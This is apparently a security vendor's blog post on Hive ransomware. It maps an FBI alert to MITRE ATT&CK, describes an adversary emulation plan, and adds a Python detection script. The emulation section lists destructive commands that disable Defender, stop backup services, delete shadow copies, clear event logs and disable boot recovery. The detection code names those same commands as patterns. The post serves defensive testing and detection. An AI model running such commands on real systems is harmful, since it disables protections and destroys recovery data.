Threat Thursday - Hive Ransomware

The FBI released a Flash Alert on August 25, 2021 warning organizations about the Hive ransomware that has affected at least 28 organizations including Memorial Health. This ransomware is new, first observed in June 2021, but operates like most ransomware we track: disabling endpoint security solutions and services, deleting backups and event logs, exfiltrating and encrypting data, and extorting the target into paying a ransom before getting access back to their systems.

As usual for #ThreatThursday, we consume the Cyber Threat Intelligence and map it to MITRE ATT&CK, create and share an adversary emulation plan on the SCYTHE GitHub, and discuss ways to prevent, detect, and respond to this threat.

Cyber Threat Intelligence

We first heard of the Hive Ransomware when Memorial Health released a statement about the attack. Unfortunately, the information provided did not include actionable intelligence to emulate the new threat. On August 25, 2021, the FBI released a Flash Alert with more details but without MITRE ATT&CK mapping:

Hive ransomware, which was first observed in June 2021 and likely operates as an affiliate-based ransomware, employs a wide variety of tactics, techniques, and procedures (TTPs), creating significant challenges for defense and mitigation. Hive ransomware uses multiple mechanisms to compromise business networks, including phishing emails with malicious attachments to gain access and Remote Desktop Protocol (RDP) to move laterally once on the network.
After compromising a victim network, Hive ransomware actors exfiltrate data and encrypt files on the network. The actors leave a ransom note in each affected directory within a victim’s system, which provides instructions on how to purchase the decryption software. The ransom note also threatens to leak exfiltrated victim data on the Tor site, “HiveLeaks.”

Following our Purple Team Exercise Framework, the next step is to extract the tactics, techniques, and procedures from the Cyber Threat Intelligence and analyze & organize them. As usual, we provide a MITRE ATT&CK Navigator layer for Hive matched to the TTPs.

Description: The Hive ransomware has affected at least 28 organizations including Memorial Health since June 2021. It operates like most ransomware: disabling endpoint security solutions and services, deleting backups and event logs, exfiltrating and encrypting data, and extorting the target into paying a ransom before getting access back to their systems.

Tactic              | Techniques
--------------------|----------------------------------------------------------------------
Initial Access      | T1566 - Phishing
Execution           | T1059.001 - Command and Scripting Interpreter: PowerShell
                    | T1059.003 - Command and Scripting Interpreter: Windows Command Shell
                    | T1047 - Windows Management Instrumentation
Command and Control | T1071 - Application Layer Protocol: HTTPS
                    | T1573 - Encrypted Channel: HTTPS
                    | T1219 - Remote Access Software
Defense Evasion     | T1070.001 - Indicator Removal on Host: Clear Windows Event Logs
                    | T1562.001 - Impair Defenses: Disable or Modify Tools
Collection          | T1074.001 - Local Data Staging
                    | T1560 - Archive Collected Data
Exfiltration        | T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage
Impact              | T1486 - Data Encrypted for Impact
                    | T1489 - Service Stop
                    | T1490 - Inhibit System Recovery
                    | T1491.001 - Internal Defacement


Adversary Emulation Plan

The FBI alert provided some procedures, which are always welcome from Cyber Threat Intelligence providers. We packed the plan up and shared it in our Community Threats GitHub. We added a note because this threat is destructive:

Note: this threat, if executed with administrative privileges, will disable services, delete Volume Shadow Copies, delete Windows Event Logs, and modify bootup. For testing purposes, you may want to test in non-production, make an offline backup, and/or take a snapshot.

To execute with SCYTHE:

  1. Download and import the threat in JSON format to your SCYTHE instance
  2. Download the Virtual File System (VFS) files under the VFS folder
  3. Upload the VFS files to your SCYTHE VFS in the following location: VFS:/shared/Hive
  4. Create a new campaign, selecting HTTPS, and configure your HTTPS communication options.
  5. Import from Existing Threat: Hive
  6. Launch Campaign
  7. Download the EXE and rename it to Winlo_dump_64_SCY.exe

To execute this attack chain manually, you can open an elevated command line interface and run:

  • powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
  • sc stop LanmanWorkstation
  • sc stop SamSs
  • sc stop SDRSVC
  • sc stop SstpSVc
  • sc stop UI0Detect
  • sc stop Vmicvss
  • sc stop Vmss
  • sc stop VSS
  • sc stop Wbengine
  • sc stop Unistoresvc
  • wmic.exe SHADOWCOPY /nointeractive
  • wmic.exe shadowcopy delete
  • wevtutil.exe cl system
  • wevtutil.exe cl security
  • wevtutil.exe cl application
  • bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
  • bcdedit.exe /set {default} recoveryenabled norun

Of course, the manual method will not include a number of the TTPs that make the SCYTHE campaign more realistic. If you do use SCYTHE, you will see the client have data exfiltrated and encrypted, a Hive key file written, and the ransom note open on your desktop.

Detect & Respond

As with most ransomware, you will want to be able to detect and respond to the attack "left of boom", where boom is exfiltration and encryption. Most ransomware is very noisy. Here are some items to consider detecting so you can respond to Hive ransomware before boom:

  • Detecting Command and Control is an area where most Endpoint Detection and Response solutions are weak. Consider Network Detection and Response solutions for this use case, which is present in most attacks.
  • Detect privilege escalation attempts: Hive requires administrative privileges to stop services, clear logs, and modify the bootup process.
  • Train your team to respond to alerts quickly as a way to limit impact.
  • For preventive controls, check out the recommendations in the FBI Alert.
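The staging steps listed in the manual attack chain above (Defender disabled, VSS and backup services stopped, shadow copies deleted, event logs cleared, boot recovery disabled) are exactly what a "left of boom" detection should key on. The following is an added example, not SCYTHE's code or part of the emulation plan: it runs simple command-line rules over constructed process-creation events in a made-up `timestamp|host|user|CommandLine` format, tags each match with its ATT&CK ID from the table above, and only escalates a host once several distinct pre-impact techniques fire there, so a lone `sc stop` from a backup account does not page anyone.

```python
import re
from collections import namedtuple

# Rules keyed on the command lines in the FBI alert and the manual chain above:
# (ATT&CK ID, description, regex matched against the process command line).
HIVE_RULES = [
    ("T1562.001", "Impair Defenses: Defender real-time monitoring disabled",
     re.compile(r"Set-MpPreference\b.*-DisableRealtimeMonitoring\s+\$?true", re.I)),
    ("T1489", "Service Stop: backup/VSS-related service stopped",
     re.compile(r"\bsc(?:\.exe)?\s+stop\s+(VSS|Vmicvss|Vmss|Wbengine|SDRSVC|SamSs)\b", re.I)),
    ("T1490", "Inhibit System Recovery: shadow copies deleted",
     re.compile(r"\bwmic(?:\.exe)?\s+shadowcopy\s+delete\b", re.I)),
    ("T1490", "Inhibit System Recovery: boot recovery disabled",
     re.compile(r"\bbcdedit(?:\.exe)?\s+/set\b.*(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)", re.I)),
    ("T1070.001", "Indicator Removal on Host: Windows event log cleared",
     re.compile(r"\bwevtutil(?:\.exe)?\s+cl\s+(system|security|application)\b", re.I)),
]
Hit = namedtuple("Hit", "host technique description command")

def detect_hive_ttps(lines):
    """One Hit per (event, rule) match. Event format is constructed, not a real
    EDR schema: timestamp|host|user|CommandLine."""
    hits = []
    for line in lines:
        parts = line.rstrip("\n").split("|", 3)
        if len(parts) != 4:
            continue  # skip malformed events rather than crash the pipeline
        _ts, host, _user, cmd = parts
        hits.extend(Hit(host, tid, desc, cmd) for tid, desc, rx in HIVE_RULES if rx.search(cmd))
    return hits

def techniques_by_host(hits):
    by_host = {}
    for h in hits:
        by_host.setdefault(h.host, set()).add(h.technique)
    return {host: sorted(t) for host, t in by_host.items()}

def hosts_left_of_boom(hits, min_techniques=2):
    """A lone 'sc stop' is noise; several distinct pre-impact techniques on one host is the staging pattern worth paging on."""
    return sorted(h for h, t in techniques_by_host(hits).items() if len(t) >= min_techniques)

# Constructed sample events (not real telemetry): WS01 runs the staging chain, FS02 has a lone backup-service stop, WS03 is benign.
SAMPLE_LOG = """\
2021-08-26T10:01:05|WS01|CORP\\jdoe|powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIOAVProtection $true
2021-08-26T10:01:09|WS01|CORP\\jdoe|sc stop VSS
2021-08-26T10:01:10|WS01|CORP\\jdoe|wmic.exe shadowcopy delete
2021-08-26T10:01:12|WS01|CORP\\jdoe|wevtutil.exe cl security
2021-08-26T10:01:13|WS01|CORP\\jdoe|bcdedit.exe /set {default} recoveryenabled norun
2021-08-26T10:05:00|FS02|CORP\\backupsvc|sc stop Wbengine
2021-08-26T10:07:00|WS03|CORP\\asmith|notepad.exe C:\\Users\\asmith\\notes.txt
""".splitlines()
```

On the constructed sample, `hosts_left_of_boom(detect_hive_ttps(SAMPLE_LOG))` returns only `WS01`; the same rules map directly onto Sysmon Event ID 1 or Windows 4688 command-line fields in a real pipeline.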

Conclusion

You can use SCYTHE to emulate the Hive Ransomware described in the recent FBI alert in order to attack, detect, and respond to adversary behaviors. As ransomware evolves, the indicators of compromise will change, leaving you in a reactive rather than a proactive stance. In this post, we took the FBI alert, extracted the tactics, techniques, and procedures (TTPs), and mapped them to MITRE ATT&CK. We then created and shared the Hive ransomware emulation plan, which you can easily import into SCYTHE to test your people, process, and technology. If you are not a SCYTHE customer or would like help running an adversary emulation, let us know.

This Threat Thursday post discusses active research by SCYTHE and other cited third parties into an ongoing threat. The information in this post should be considered preliminary and may be updated as research continues. This information is provided “as-is” without any warranty or condition of any kind, either express or implied.